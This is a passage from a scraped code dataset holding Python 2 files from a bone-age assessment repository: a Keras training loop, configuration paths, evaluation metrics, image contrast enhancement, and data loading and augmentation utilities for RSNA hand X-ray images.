tqdm(range(start_epoch+1, start_epoch + n_epoch+1)):\n        print \"[x] epoch {} -------------------------------------------\".format(epoch)\n        for mini_batch in range(len(data_ids)//batch_size):\n            while train_data_queue.qsize() <= 0:\n                time.sleep(1)\n            if DEBUG_MODEL: print \"train data queue, qsize = %d \" % train_data_queue.qsize()\n            data_dict = train_data_queue.get()\n            loss = model.train_on_batch(x=data_dict[\"x\"], y=data_dict[\"y\"])\n            if mini_batch % 50 == 0:\n                print \"--epoch {}, mini_batch {}, loss {}\".format(epoch, mini_batch, loss)\n\n        # test\n        print \"[x] test in epoch {}\".format(epoch)\n        losses = 0.0\n        for mini_batch in range(int(0.2*len(data_ids)//batch_size)):\n            while test_data_queue.qsize() <= 0:\n                time.sleep(1)\n            data_dict = test_data_queue.get()\n            loss = model.test_on_batch(data_dict[\"x\"], data_dict[\"y\"])\n            losses += loss\n        losses = losses/(int(0.2*len(data_ids)//batch_size))  # average over the number of test batches actually run\n        print \"== epoch {}, test loss {}\".format(epoch, losses)\n\n        # test and metric\n        print \"[x] predict in epoch {}\".format(epoch)\n        y_true = []\n        y_pred = []\n        for mini_batch in range(int(0.2*len(data_ids)//batch_size)):\n            while test_data_queue.qsize() <= 0:\n                time.sleep(1)\n            data_dict = test_data_queue.get()\n            pred_y = model.predict_on_batch(data_dict[\"x\"])\n            for i in range(batch_size):\n                y_true.append(data_dict[\"y\"][i]*SCALE)\n                y_pred.append(pred_y[i]*SCALE)\n\n        evs, mae, mse, meae, r2s, ccc = regression_metric(np.array(y_true), np.array(y_pred))\n        save_obj({\"evs\": evs, \"mae\": mae, \"mse\": mse, \"meae\": meae, \"r2s\": r2s, \"ccc\": ccc, \"loss\": losses},\n                 name=metric_out_dir+\"/epoch_{}.pkl\".format(epoch))\n\n        if mae < best_mae:\n            best_mae = mae\n            tolerance = 0\n            model.save_weights(model_out_dir + \"/model.h5\")\n        else:\n            tolerance += 1\n\n        print \"[x] epoch {}, evs {}, mae {}, mse {}, meae {}, r2s {}, ccc {}\".format(epoch, evs, mae, mse, meae, r2s, ccc)\n\n        if tolerance > TOLERANCE:\n            break\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"rm\")\n    parser.add_argument('--img_size', type=int, help=\"image size\", default=128)\n    parser.add_argument('--gpu_id', type=int, default=0)\n    parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=16)\n    parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\n    parser.add_argument('--start_layer', type=int, help=\"start_layer\", 
default=-1)\n parser.add_argument('--data_thread_num', type=int, help=\"data thread num\", default=5)\n FLAGS = parser.parse_args()\n\n pprint.pprint(FLAGS)\n\n exp_name = FLAGS.exp\n num_gpu = 1\n gpu_id = FLAGS.gpu_id\n img_size = FLAGS.img_size\n batch_size = FLAGS.batch_size * num_gpu\n sex = FLAGS.sex\n start_layer = FLAGS.start_layer\n data_thread_num = FLAGS.data_thread_num\n\n print \"[x] building models on GPU {}\".format(gpu_id)\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config))\n\n metric_out_dir = \"E{}_S{}_IMG_{}/metric\".format(exp_name, sex, img_size)\n model_out_dir = \"E{}_S{}_IMG_{}/model\".format(exp_name, sex, img_size)\n if not os.path.isdir(metric_out_dir):\n os.makedirs(metric_out_dir)\n if not os.path.isdir(model_out_dir):\n os.makedirs(model_out_dir)\n start_epoch = len(os.listdir(metric_out_dir))\n\n # training\n train(n_epoch=N_TRAINING_EPOCH,\n img_size=img_size,\n sex=sex,\n batch_size=batch_size,\n num_gpu=num_gpu,\n start_layer=start_layer,\n start_epoch=start_epoch,\n data_thread=data_thread_num)\n" }, { "alpha_fraction": 0.6668700575828552, "alphanum_fraction": 0.7175107002258301, "avg_line_length": 28.799999237060547, "blob_id": "76706bd326bc90fdefc5c13781e5b34eb97f469d", "content_id": "33e692142afa7ffd994727be549c6002ce62492e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1639, "license_type": "no_license", "max_line_length": 63, "num_lines": 55, "path": "/al_segmentation/config.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "# RSNA DATA\nRSNA_DATA_DIR = \"../data/boneage-training-dataset/\"\nRSNA_TRAIN_CSV = \"../data/csv/train.csv\"\nRSNA_GT = \"../data/gt/annotated\"\nRSNA_GT_NP_ANNOTATED = \"../data/gt/annotated/np\"\nRSNA_GT_NP_UNANNOTATED = \"../data/gt/unannotated\"\nRSNA_GT_NEW = \"../data/gt/new\"\nRSNA_GT_KEY_POINT = \"../data/gt/key_point_xml\"\n\n# pre processing\nRSNA_SEGMENT_SAVE_DIR = \"../data/segmented_hand_al/\"\nRSNA_SEG_ALL = \"../data/segmented_all\"\nRSNA_SEG_ENHANCE = \"../data/segmented_enhance\"\nTHRESH_RATIO = 0.9\nIMAGE_SIZE = 256\n\n\nRSNA_TF_VGG16_PATH = \"../transfer_features/vgg16/\"\nRSNA_TF_VGG19_PATH = \"../transfer_features/vgg19/\"\nRSNA_TF_INCEPTION_V3_PATH = \"../transfer_features/inceptionv3/\"\nRSNA_TF_INCEPTION_V4_PATH = \"../transfer_features/inceptionv4/\"\nRSNA_TF_RESNET50_PATH = \"../transfer_features/resnet50/\"\nRSNA_TF_XCEPTION_PATH = \"../transfer_features/xception/\"\n\n# model\nDEBUG_MODEL = False\nN_TRAINING_EPOCH = 100\nAL_UNCERTAINTY_NUM = 10\nTEST_NUM = 20\nSCALE = 240.\n\nFINE_TUNE_ALL = \"3\"\n# Finetune - INCEPTION V3\nINCEPTION_V3_INCEPTION_3 = \"0\"\nINCEPTION_V3_INCEPTION_3_START = 40\nINCEPTION_V3_INCEPTION_4 = \"1\"\nINCEPTION_V3_INCEPTION_4_START = 87\nINCEPTION_V3_INCEPTION_5 = \"2\"\nINCEPTION_V3_INCEPTION_5_START = 229\n\n# Finetune - INCEPTION-RES V2\nINCEPTION_RESNET_V2_INCEPTION_A = \"0\"\nINCEPTION_RESNET_V2_INCEPTION_A_START = 40\nINCEPTION_RESNET_V2_INCEPTION_B = \"1\"\nINCEPTION_RESNET_V2_INCEPTION_B_START = 275\nINCEPTION_RESNET_V2_INCEPTION_C = \"2\"\nINCEPTION_RESNET_V2_INCEPTION_C_START = 618\n\n# Finetune Xception\nXCEPTION_ENTRY = \"0\"\nXCEPTION_ENTRY_START = 15\nXCEPTION_MID = \"1\"\nXCEPTION_MID_START = 35\nXCEPTION_EXIT = \"2\"\nXCEPTION_EXIT_START = 116\n" }, { "alpha_fraction": 
0.5758620500564575, "alphanum_fraction": 0.5850574970245361, "avg_line_length": 21.33333396911621, "blob_id": "1028d595b639562d4e18b05cc057ff95f46b6c56", "content_id": "7f27c5aaed40865a694ad98c1034820ced1dca22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 870, "license_type": "no_license", "max_line_length": 79, "num_lines": 39, "path": "/al_segmentation/step3_check_data.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\n\nfrom glob import glob\n\nimport utils_data\nfrom config import *\n\n\ndef get_miss_ids():\n data_dir = \"./interactive_segmentation_dice1.0_pixel1.0_GPU0/segmented_all\"\n\n data_files = glob(data_dir + \"/*_crop_seg.png\")\n\n existed_ids = []\n for data_file in data_files:\n data_id = data_file[data_file.rfind(\"/\") + 1: data_file.find(\"_crop\")]\n existed_ids.append(data_id)\n\n all_ids = []\n data_files = glob(RSNA_DATA_DIR + \"/*.png\")\n for data_file in data_files:\n data_id = data_file[data_file.rfind(\"/\") + 1: data_file.find(\".png\")]\n all_ids.append(data_id)\n\n for id in existed_ids:\n all_ids.remove(id)\n\n return all_ids\n\n\ndef check_all():\n missed_ids = get_miss_ids()\n if len(missed_ids) == 0:\n print \"!!!!\"\n else:\n print missed_ids\n\nif __name__ == \"__main__\":\n check_all()" }, { "alpha_fraction": 0.6081143617630005, "alphanum_fraction": 0.6242508292198181, "avg_line_length": 33.412696838378906, "blob_id": "48e79d8579d93a0a11bd2d3cade5d8b45d318ad5", "content_id": "176328f7e9cc183d0bbb497b2d33221dbc8009cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2169, "license_type": "no_license", "max_line_length": 126, "num_lines": 63, "path": "/paced_transfer/utils_metric.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, median_absolute_error, r2_score, explained_variance_score\nfrom sklearn.metrics import roc_curve, roc_auc_score, precision_recall_curve\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix\n\ndef regression_metric(y_true, y_pred):\n # explained_variance_score\n evs = explained_variance_score(y_true, y_pred)\n # mean_absolute_error\n mae = mean_absolute_error(y_true, y_pred)\n # mean_squared_error\n mse = mean_squared_error(y_true, y_pred)\n # median_absolute_error\n meae = median_absolute_error(y_true, y_pred)\n # r^2_score\n r2s = r2_score(y_true, y_pred)\n ccc = _ccc(y_true, y_pred)\n return evs, mae, mse, meae, r2s, ccc\n\n\ndef _ccc(y_true, y_pred):\n x_mean = np.average(y_true)\n y_mean = np.average(y_pred)\n n = y_true.shape[0]\n s_xy = np.sum(np.multiply(y_true-x_mean, y_pred-y_mean)) / n\n s_x2 = np.sum([np.power(e, 2) for e in (y_true - x_mean)]) / n\n s_y2 = np.sum([np.power(e, 2) for e in (y_pred - y_mean)]) / n\n return 2*s_xy / (s_x2+s_y2+np.power(x_mean-y_mean, 2))\n\n\ndef AUC_ROC(true_vessel_arr, pred_vessel_arr):\n \"\"\"\n Area under the ROC curve with x axis flipped\n \"\"\"\n fpr, tpr, _ = roc_curve(true_vessel_arr, pred_vessel_arr)\n AUC_ROC = roc_auc_score(true_vessel_arr.flatten(), pred_vessel_arr.flatten())\n return AUC_ROC, fpr, tpr\n\n\ndef AUC_PR(true_vessel_img, pred_vessel_img):\n \"\"\"\n Precision-recall curve\n \"\"\"\n try:\n precision, recall, _ = precision_recall_curve(true_vessel_img.flatten(), pred_vessel_img.flatten(), pos_label=1)\n 
AUC_prec_rec = auc(recall, precision)\n return AUC_prec_rec, precision, recall\n except:\n return 0.\n\n\ndef classify_metrics(y_true, y_pred):\n \"\"\"\n cm = confusion_matrix(y_true, y_pred)\n acc = 1. * (cm[0, 0] + cm[1, 1]) / np.sum(cm)\n sensitivity = 1. * cm[1, 1] / (cm[1, 0] + cm[1, 1])\n specificity = 1. * cm[0, 0] / (cm[0, 1] + cm[0, 0])\n return acc, sensitivity, specificity\n \"\"\"\n acc = accuracy_score(y_true, y_pred)\n return acc\n\n" }, { "alpha_fraction": 0.473026305437088, "alphanum_fraction": 0.4802631437778473, "avg_line_length": 32.065216064453125, "blob_id": "5a33ae5bc1b4279ac15014159c2e94839477648c", "content_id": "960901b86f5c63c9b11e0184c6799bda517ce116", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1520, "license_type": "no_license", "max_line_length": 120, "num_lines": 46, "path": "/al_segmentation/step5_statiscal_data.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import argparse\nimport pprint\nimport numpy as np\nimport os\n\nfrom glob import glob\nfrom utils_data import load_obj\nfrom config import *\n\n\nmodel_names = [\"inception_v3\", \"inception_resnet_v2\", \"xception\"]\nsexs = [\"0\", \"1\", \"2\"]\nfine_tunes = [\"0\", \"3\"]\naugments = [\"True\"]\nkeys = [\"evs\", \"mae\", \"mse\", \"meae\", \"r2s\", \"ccc\"]\n\n\ndef best_value(data_dir, key=\"mae\", min=True):\n metric_objs = glob(data_dir+\"/*.pkl\")\n values = []\n if len(metric_objs) != N_TRAINING_EPOCH:\n return 0.0\n for i in range(N_TRAINING_EPOCH):\n obj = load_obj(data_dir+\"/epoch_{}.pkl\".format(i))\n value = obj[key]\n values.append(value)\n if min:\n return np.min(values)\n else:\n return np.max(values)\n\n\n\nfor model_name in model_names:\n for fine_tune in fine_tunes:\n for sex in sexs:\n for augment in augments:\n metric_out_dir = \"E{}_M{}_S{}_A{}_F{}/metric\".format(\"regression2\", model_name, sex, augment, fine_tune)\n # print metric_dir\n if os.path.isdir(metric_out_dir):\n print \"==========================================================================================\"\n print metric_out_dir\n for key in keys:\n print \"{}, min: {}, max: {}\".format(key,\n best_value(metric_out_dir, key, True),\n best_value(metric_out_dir, key, False))" }, { "alpha_fraction": 0.6432502269744873, "alphanum_fraction": 0.6655875444412231, "avg_line_length": 28.150943756103516, "blob_id": "fa02281055e82c72e17855b9597a7f71df425d23", "content_id": "955027c67858a19872ef4114c64878c6dfc20131", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3089, "license_type": "no_license", "max_line_length": 101, "num_lines": 106, "path": "/al_segmentation/step8_img_contrast.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport os\n\nfrom skimage import data, img_as_float\nfrom skimage import exposure\nfrom config import *\nfrom glob import glob\nfrom tqdm import tqdm\n\n\"\"\"\nmatplotlib.rcParams['font.size'] = 8\ndef plot_img_and_hist(img, axes, bins=256):\n img = img_as_float(img)\n ax_img, ax_hist = axes\n ax_cdf = ax_hist.twinx()\n\n # Display image\n ax_img.imshow(img, cmap=plt.cm.gray)\n ax_img.set_axis_off()\n ax_img.set_adjustable('box-forced')\n\n # Display histogram\n ax_hist.hist(img.ravel(), bins=bins, histtype='step', color='black')\n ax_hist.ticklabel_format(axis='y', style='scientific', scilimits=(0, 0))\n 
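# A quick numeric sanity check for the _ccc helper defined in utils_metric.py
# above (Lin's concordance correlation coefficient): identical series should
# score exactly 1.0, while a constant offset keeps the Pearson correlation at 1
# but pulls the CCC below it. Illustrative only, assuming utils_metric is
# importable from this directory; it is not part of the original test suite.
import numpy as np

from utils_metric import _ccc

y_true = np.array([10., 20., 30., 40.], dtype=np.float32)
print _ccc(y_true, y_true)       # 1.0: perfect agreement
print _ccc(y_true, y_true + 5.)  # < 1.0: same trend, biased by +5 months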
ax_hist.set_xlabel('Pixel intensity')\n ax_hist.set_xlim(0, 1)\n ax_hist.set_yticks([])\n\n # Display cumulative distribution\n img_cdf, bins = exposure.cumulative_distribution(img, bins)\n ax_cdf.plot(bins, img_cdf, 'r')\n ax_cdf.set_yticks([])\n\n return ax_img, ax_hist, ax_cdf\n\n\n# Load an example image\nimg = cv2.imread(RSNA_SEG_ALL+\"/14879_seg.png\", cv2.IMREAD_GRAYSCALE)\n\n# Contrast stretching\np2, p98 = np.percentile(img, (2, 98))\nimg_rescale = exposure.rescale_intensity(img, in_range=(p2, p98))\n\n# Equalization\nimg_eq = exposure.equalize_hist(img)\n\n# Adaptive Equalization\nimg_adapteq = exposure.equalize_adapthist(img, clip_limit=0.03)\n\n# Display results\nfig = plt.figure(figsize=(8, 5))\naxes = np.zeros((2, 4), dtype=np.object)\naxes[0, 0] = fig.add_subplot(2, 4, 1)\nfor i in range(1, 4):\n axes[0, i] = fig.add_subplot(2, 4, 1+i, sharex=axes[0,0], sharey=axes[0,0])\nfor i in range(0, 4):\n axes[1, i] = fig.add_subplot(2, 4, 5+i)\n\nax_img, ax_hist, ax_cdf = plot_img_and_hist(img, axes[:, 0])\nax_img.set_title('Low contrast image')\n\ny_min, y_max = ax_hist.get_ylim()\nax_hist.set_ylabel('Number of pixels')\nax_hist.set_yticks(np.linspace(0, y_max, 5))\n\nax_img, ax_hist, ax_cdf = plot_img_and_hist(img_rescale, axes[:, 1])\nax_img.set_title('Contrast stretching')\n\nax_img, ax_hist, ax_cdf = plot_img_and_hist(img_eq, axes[:, 2])\nax_img.set_title('Histogram equalization')\n\nax_img, ax_hist, ax_cdf = plot_img_and_hist(img_adapteq, axes[:, 3])\nax_img.set_title('Adaptive equalization')\n\nax_cdf.set_ylabel('Fraction of total intensity')\nax_cdf.set_yticks(np.linspace(0, 1, 5))\n\n# prevent overlap of y-axis labels\nfig.tight_layout()\nplt.show()\n\"\"\"\n\n\ndef enhance_image(img):\n img_adapteq = exposure.equalize_adapthist(img, clip_limit=0.03)\n return img_adapteq\n\n\ndef enhance_all():\n output_dir = RSNA_SEG_ENHANCE\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n\n img_files = glob(RSNA_SEG_ALL + \"/*.*\")\n for img_file in tqdm(img_files):\n img_name = img_file[img_file.rfind(\"/\")+1: img_file.rfind(\"_seg\")]\n img = cv2.imread(img_file, cv2.IMREAD_GRAYSCALE)\n img_enh = enhance_image(img)\n plt.imsave(fname=RSNA_SEG_ENHANCE + \"/{}_seg.png\".format(img_name), arr=img_enh, cmap=\"gray\")\n #cv2.imwrite(RSNA_SEG_ENHANCE + \"/{}_seg.png\".format(img_name), img_enh)\n\nif __name__ == \"__main__\":\n enhance_all()" }, { "alpha_fraction": 0.6078431606292725, "alphanum_fraction": 0.6259230971336365, "avg_line_length": 33.30131149291992, "blob_id": "d4caecfc8848bce6094ad1885e26def10bd9bb12", "content_id": "101a14717bf70c3893c600f12812e549478a3779", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7854, "license_type": "no_license", "max_line_length": 126, "num_lines": 229, "path": "/paced_transfer/utils_data.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport cv2\nimport os\nimport pickle\nimport h5py\nimport keras\n\nfrom keras.utils import multi_gpu_model\nfrom keras import optimizers\nfrom keras.backend.tensorflow_backend import set_session\n\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input as inception_v3_input\n\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_resnet_v2 import preprocess_input as inception_resnet_input\n\nfrom keras.applications.xception import Xception\nfrom 
keras.applications.xception import preprocess_input as xception_input\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, median_absolute_error, r2_score, explained_variance_score\nfrom tqdm import tqdm\nfrom utils_training import _batch_cvt\nfrom config import *\n\n\n\"\"\"\ndef load_data(sex=0, img_size=256, augment=False, preprocess_fn=inception_v3_input, debug=False, regression=True):\n data_dir = RSNA_SEG_ENHANCE\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n if sex == 0:\n boneages = dataset_df.boneage\n ids = dataset_df.id\n elif sex == 1:\n boneages = dataset_df[dataset_df.male==True].boneage\n ids = dataset_df[dataset_df.male==True].id\n elif sex == 2:\n boneages = dataset_df[dataset_df.male==False].boneage\n ids = dataset_df[dataset_df.male==False].id\n\n bas_l = []\n ids_l = []\n if debug:\n ids = ids[:100]\n\n n_data = len(ids)\n for i in range(len(ids)):\n boneage = boneages.ix[boneages.index[i]]\n ids_l.append(ids.ix[ids.index[i]])\n bas_l.append(boneage)\n\n x = []\n y = []\n for i in tqdm(range(n_data)):\n id = ids_l[i]\n boneage = bas_l[i]\n img_file_name = data_dir + \"/{}_seg.png\".format(id)\n if os.path.isfile(img_file_name):\n img = cv2.imread(img_file_name, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (img_size, img_size))\n img = np.array(img, dtype=np.float32)\n img = preprocess_fn(img)\n x.append(img)\n y.append(boneage)\n\n if augment:\n flipped = cv2.flip(img, 1) # horzational flip\n for angle in range(-60, 61, 30):\n M = cv2.getRotationMatrix2D(center=(img.shape[0]/2, img.shape[1]/2), angle=angle, scale=1)\n dst_ori = cv2.warpAffine(img, M, (img.shape[0], img.shape[1]))\n dst_flip = cv2.warpAffine(flipped, M, (img.shape[0], img.shape[1]))\n x.append(dst_ori)\n x.append(dst_flip)\n\n y.append(boneage)\n y.append(boneage)\n\n x = np.array(x, dtype=np.float32)\n if regression:\n y = np.array(y, dtype=np.float32)\n y = y/SCALE\n else:\n y = np.array(y, dtype=np.int32)\n y = keras.utils.to_categorical(y, num_classes=int(SCALE))\n y = np.array(y, dtype=np.float32)\n\n print \"[x] load %d data\" % x.shape[0]\n return x, y\n\"\"\"\n\ndef save_obj(obj, name):\n with open(name, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(name):\n with open(name, 'rb') as f:\n return pickle.load(f)\n\n\ndef load_hdf5(infile, key=\"data\"):\n with h5py.File(infile, \"r\") as f:\n return f[key][()]\n\n\ndef write_hdf5(value, outfile, key=\"data\"):\n with h5py.File(outfile, \"w\") as f:\n f.create_dataset(key, data=value, dtype=value.dtype)\n\n\ndef load_sex_ids(sex=0):\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n ids = []\n if sex == 0:\n for i in range(len(dataset_df.index)):\n id = dataset_df.ix[dataset_df.index[i]]['id']\n ids.append(id)\n elif sex == 1:\n sex_df = dataset_df[dataset_df.male == True]\n for i in range(len(sex_df.index)):\n id = dataset_df.ix[sex_df.index[i]]['id']\n ids.append(id)\n elif sex == 2:\n sex_df = dataset_df[dataset_df.male == False]\n for i in range(len(sex_df.index)):\n id = dataset_df.ix[sex_df.index[i]]['id']\n ids.append(id)\n\n return np.array(ids)\n\n\ndef load_data(sex=0, img_size=299, batch_size=32, augment_times=5):\n data_ids = load_sex_ids(sex)\n select_ids = np.random.permutation(data_ids)[:batch_size]\n batch_x, batch_y = augment_data_with_ids(select_ids, img_size, augment_times=augment_times)\n return _batch_cvt(batch_x), batch_y\n\n\ndef augment_data_with_ids(ids, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_SEG_ENHANCE, 
augment_times=5):\n imgs = []\n boneages = []\n for id in ids:\n ims, bas = _augment_data_with_id(id, img_size, preprocess_fn, data_dir, augment_times)\n imgs.extend(ims)\n boneages.extend(bas)\n\n imgs = np.array(imgs, dtype=np.float32)\n boneages = np.array(boneages, dtype=np.float32)\n indexes = np.random.permutation(range(imgs.shape[0]))\n imgs = imgs[indexes]\n boneages = boneages[indexes]\n return imgs, boneages\n\n\ndef load_data_sex(sex, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_SEG_ENHANCE):\n ids = load_sex_ids(sex)\n imgs = []\n boneages = []\n for _id in tqdm(ids):\n img, boneage = load_single_with_id(_id, img_size, preprocess_fn, data_dir)\n imgs.append(img)\n boneages.append(boneage)\n return np.array(imgs, dtype=np.float32), np.array(boneages, dtype=np.float32)\n\n\ndef load_single_with_id(_id, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_SEG_ENHANCE):\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n boneage = dataset_df.loc[dataset_df[\"id\"] == _id].boneage.values[0] / SCALE\n img_file_name = data_dir + \"/{}_seg.png\".format(_id)\n img = cv2.imread(img_file_name, cv2.IMREAD_COLOR)\n img = cv2.resize(img, (img_size, img_size))\n img = preprocess_fn(np.array(img, dtype=np.float32))\n return img, boneage\n\n\ndef _augment_data_with_id(_id, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_SEG_ENHANCE, augment_times=5):\n \"\"\"\n Online sampling with data augmentation\n :param _id:\n :param img_size:\n :param preprocess_fn:\n :param dataset_df:\n :param data_dir:\n :param augment_times:\n :return:\n \"\"\"\n imgs = []\n boneages = []\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n\n boneage = dataset_df.loc[dataset_df[\"id\"]==_id].boneage.values[0] / SCALE\n img_file_name = data_dir + \"/{}_seg.png\".format(_id)\n img = cv2.imread(img_file_name, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (img_size, img_size))\n\n imgs.append(preprocess_fn(np.array(img, dtype=np.float32)))\n boneages.append(boneage)\n\n if augment_times > 0:\n flipped = cv2.flip(img, 1) # horzational flip\n imgs.append(preprocess_fn(np.array(flipped, dtype=np.float32)))\n boneages.append(boneage)\n for i in range(augment_times):\n angle = np.random.randint(0, 360)\n M = cv2.getRotationMatrix2D(center=(img.shape[0] / 2, img.shape[1] / 2), angle=angle, scale=1)\n dst_ori = cv2.warpAffine(img, M, (img.shape[0], img.shape[1]), borderMode=cv2.BORDER_CONSTANT, borderValue=0)\n dst_flip = cv2.warpAffine(flipped, M, (img.shape[0], img.shape[1]), borderMode=cv2.BORDER_CONSTANT, borderValue=0)\n imgs.append(preprocess_fn(np.array(dst_ori, dtype=np.float32)))\n imgs.append(preprocess_fn(np.array(dst_flip, dtype=np.float32)))\n\n boneages.append(boneage)\n boneages.append(boneage)\n\n return imgs, boneages\n\n\nif __name__ == \"__main__\":\n \"\"\"\n data_x, data_y = \\\n load_data(sex=0, img_size=256, augment=False, preprocess_fn=inception_v3_input, debug=True, regression=False)\n \"\"\"\n import matplotlib.pyplot as plt\n\n imgs, boneages = load_data_sex(1)\n\n print imgs.shape\n print boneages.shape" }, { "alpha_fraction": 0.5756087303161621, "alphanum_fraction": 0.5897278785705566, "avg_line_length": 31.586666107177734, "blob_id": "32cba737ec5330a347f3038bc2a19571b7ee75cf", "content_id": "55ef05c92e7b271e196d4d4a344767a7d73690e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4887, "license_type": "no_license", "max_line_length": 97, "num_lines": 150, "path": "/al_segmentation/utils_data.py", "repo_name": 
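A usage sketch for the loaders above: load_data samples batch_size ids and expands each into 2 + 2*augment_times images (the original plus a horizontal flip, then rotated copies of both), so batch_size=4 with augment_times=5 should yield 48 samples. This assumes the enhanced segmentations already exist under RSNA_SEG_ENHANCE, and that _batch_cvt from utils_training replicates the grayscale channel to three channels, as its al_segmentation counterpart does.

from utils_data import load_data

batch_x, batch_y = load_data(sex=1, img_size=299, batch_size=4, augment_times=5)
print batch_x.shape  # expected: (48, 299, 299, 3)
print batch_y.shape  # expected: (48,)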
"ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nimport pickle\nimport os\nimport h5py\n\nfrom tqdm import tqdm\nfrom glob import glob\nfrom config import *\n\n\ndef _read_and_resize(files):\n \"\"\"\n read images and pad images to rect\n :param files:\n :return:\n \"\"\"\n data = []\n for f in tqdm(files):\n img = cv2.imread(f, cv2.IMREAD_GRAYSCALE)\n if img.shape[0] > img.shape[1]:\n pad = (img.shape[0] - img.shape[1]) // 2\n pad_tuple = ((0, 0), (pad, pad))\n else:\n pad = (img.shape[1] - img.shape[0]) // 2\n pad_tuple = ((pad, pad), (0, 0))\n img = np.pad(img, pad_tuple, mode=\"constant\")\n img = cv2.resize(img, (IMAGE_SIZE, IMAGE_SIZE), interpolation=cv2.INTER_AREA)\n data.append(img)\n return data\n\n\ndef load_unannotated_data(data_dir=RSNA_DATA_DIR, annotated_ids=[]):\n data_images = glob(data_dir+\"/*.png\")\n data_x_files = []\n unannotated_ids = []\n for data_image in data_images:\n data_id = data_image[data_image.rfind(\"/\")+1: data_image.rfind(\".\")]\n if data_id not in annotated_ids:\n data_x_files.append(data_image)\n unannotated_ids.append(data_id)\n\n data_x = np.expand_dims(np.asarray(_read_and_resize(data_x_files), dtype=np.float32), axis=3)\n return data_x, unannotated_ids\n\n\ndef load_unannotated_data_np(data_dir=RSNA_GT_NP_UNANNOTATED, annotated_ids=[]):\n image_x_files = glob(data_dir + \"/*_x.h5\")\n unannotated_ids = []\n data_x = []\n for image_x_file in image_x_files:\n data_id = image_x_file[image_x_file.rfind(\"/\")+1: image_x_file.find(\"_\")]\n if data_id not in annotated_ids:\n image_x = load_hdf5(image_x_file)\n data_x.append(image_x)\n unannotated_ids.append(data_id)\n\n data_x = np.expand_dims(np.asarray(data_x, dtype=np.float32), axis=3)\n return data_x, unannotated_ids\n\n\ndef load_annotated_data_np(data_dir=RSNA_GT_NP_ANNOTATED, return_ids=False):\n image_x_files = glob(data_dir+\"/*_x.h5\")\n if return_ids:\n data_ids = []\n for image_x_file in image_x_files:\n data_id = image_x_file[image_x_file.rfind(\"/\")+1: image_x_file.find(\"_\")]\n data_ids.append(data_id)\n return data_ids\n else:\n data_x = []\n data_y = []\n data_ids = []\n for i in range(len(image_x_files)):\n image_x_file = image_x_files[i]\n data_id = image_x_file[image_x_file.rfind(\"/\")+1: image_x_file.find(\"_\")]\n image_y_file = RSNA_GT_NP_ANNOTATED + \"/{}_y.h5\".format(data_id)\n image_x = load_hdf5(image_x_file)\n image_y = load_hdf5(image_y_file)\n data_x.append(image_x)\n data_y.append(image_y)\n data_ids.append(data_id)\n\n data_x = np.expand_dims(np.asarray(data_x, dtype=np.float32), axis=3)\n data_y = np.expand_dims(np.asarray(data_y, dtype=np.float32), axis=3)\n return data_x, data_y, data_ids\n\n\ndef load_annotated_data(data_dir=RSNA_SEGMENT_SAVE_DIR, return_ids=False):\n image_files = glob(data_dir+\"/*.png\")\n data_x_files = []\n data_y_files = []\n gt_ids = []\n for data_file in image_files:\n data_id = data_file[data_file.rfind('/')+1: data_file.find('_')]\n if data_id in gt_ids:\n continue\n else:\n x_image_path = data_dir + \"/{}_ori.png\".format(data_id)\n data_x_files.append(x_image_path)\n y_image_path = data_dir + \"/{}_bin.png\".format(data_id)\n data_y_files.append(y_image_path)\n gt_ids.append(data_id)\n if return_ids:\n return gt_ids\n\n data_x = np.expand_dims(np.asarray(_read_and_resize(data_x_files), dtype=np.float32), axis=3)\n data_y = np.expand_dims(np.asarray(_read_and_resize(data_y_files), dtype=np.float32), axis=3)\n return data_x, data_y\n\n\ndef 